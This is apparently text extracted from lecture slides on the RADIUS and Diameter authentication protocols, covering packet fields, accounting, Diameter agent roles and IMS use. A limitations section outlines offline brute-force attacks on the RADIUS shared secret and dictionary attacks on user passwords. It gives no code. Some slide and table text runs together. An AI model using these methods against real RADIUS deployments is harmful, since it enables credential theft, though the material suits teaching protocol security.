Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
RADIUS - Introduction :
RADIUS is an application level protocol that carries authentication, authorization and configuration information between a Network Access Server (NAS) and a Shared Authentication Server.
A standardized protocol is required between the access server and the user information repository in order to exchange authentication-, authorization-, and accounting-related information. The RADIUS protocol was designed to provide a simple, but efficient, way to deliver such AAA capability.
Terminology :
Service Session Silently discard Access-Request Access-Accept
RADIUS Overview :
User
Authentication Request
Radius Server
Authentication Acknowledgement
Radius Client
Radius Server
Accounting
Built-in accounting schemes:
Unix accounting Accounting data are stored in files and can be viewed using radwho and radlast commands Detailed accounting The detailed accounting information is stored in plain text format. The resulting files can easily be parsed using standard text processing tool. SQL accounting information stores it in an SQL database, processed using standard SQL queries.
Radius is extensible
Packet Frame:
Details
Code Identifier
Length
Authenticator - Value used to authenticate the reply from the RADIUS server Attributes - The data
Limitations
Response Authenticator Based Shared Secret Attack Attacker listens to requests and server responses, and pre-compute MD5 state, which is the prefix of the response authenticator: MD5(Code+ID+Length+ReqAuth+Attrib) Perform an exhaustive search on shared secret, adding it to the above MD5 state each time. User-Password Attribute Based Shared Secret Attack Perform an exhaustive search on shared secret. The attacker attempts a connection to the NAS, and intercepts the accessrequest. User-Password Based Password Attack Performs an exhaustive / dictionary attack on password, XORing it with above MD5 and sending it each time in appropriate attribute. Possible due to no authentication on request packet.
Limitations
Continued
Shared Secret Hygiene Viewed as single client Small key size enabling easy attack Request Authenticator Based Attacks Passive User-Password Compromise through Repeated Request Authenticators Active User-Password Compromise through Repeated Request Authenticators
Attacker builds a dictionary as before. When he predicts he can cause NAS to use a certain ReqAuth, he tries to connect it and intercepts access-request.
Diameter - Introduction
The Diameter protocol was derived from the RADIUS protocol with a lot of
improvements in different aspects, and is generally believed to be the next generation Authentication, Authorization, and Accounting (AAA) protocol. The Diameter protocol was widely used in the IMS architecture for IMS entities to exchange AAA-related information. Next generation Authentication, Authorization, and Accounting (AAA) protocol
every host who implements the Diameter protocol can act as either a client or a server depending on network deployment
A Relay Agent is used to forward a message to the appropriate destination, depending on the information contained in the message. Proxy Agent A Proxy Agent can also be used to forward messages, but unlike a Relay Agent, a Proxy Agent can modify the message content and, therefore, provide value-added services, enforce rules on different messages, or perform administrative tasks for a specific realm.
Redirect Agent A Redirect Agent acts as a centralized configuration repository for other Diameter nodes. When it receives a message, it checks its routing table, and returns a response message along with redirection information to its original sender
Special agent
Translation Agent
Translation Agent. The responsibility of this agent, as you might have guessed, is to convert a message from one AAA protocol to another
Agent Support
Implicit support, which means the agent behaviors might be implemented in a RADIUS server
Negotiate supported applications and security level Don't support Static configuration and dynamic lookup Supported. for example, reauthentication message, Session termination 16,777,215 octets Support both vendor-specific messages and attributes Static configuration
Summary
RADIUS is a remote authentication protocol. RADIUS is a de-facto standard for remote authentication. RADIUS is an extensible protocol, and can support many authentication
Cont..
In addition to SIP, Diameter is the other core protocol used
in the IP Multimedia Subsystem (IMS) architecture, both in the service plane and the control plane. IMS defines a set of reference points between different IMS entities and some of them use Diameter as the underlying protocol to exchange subscription-, presence-, and billing-related messages. For example, the Sh reference point in IMS defined a set of Diameter messages for subscription and notification purposes.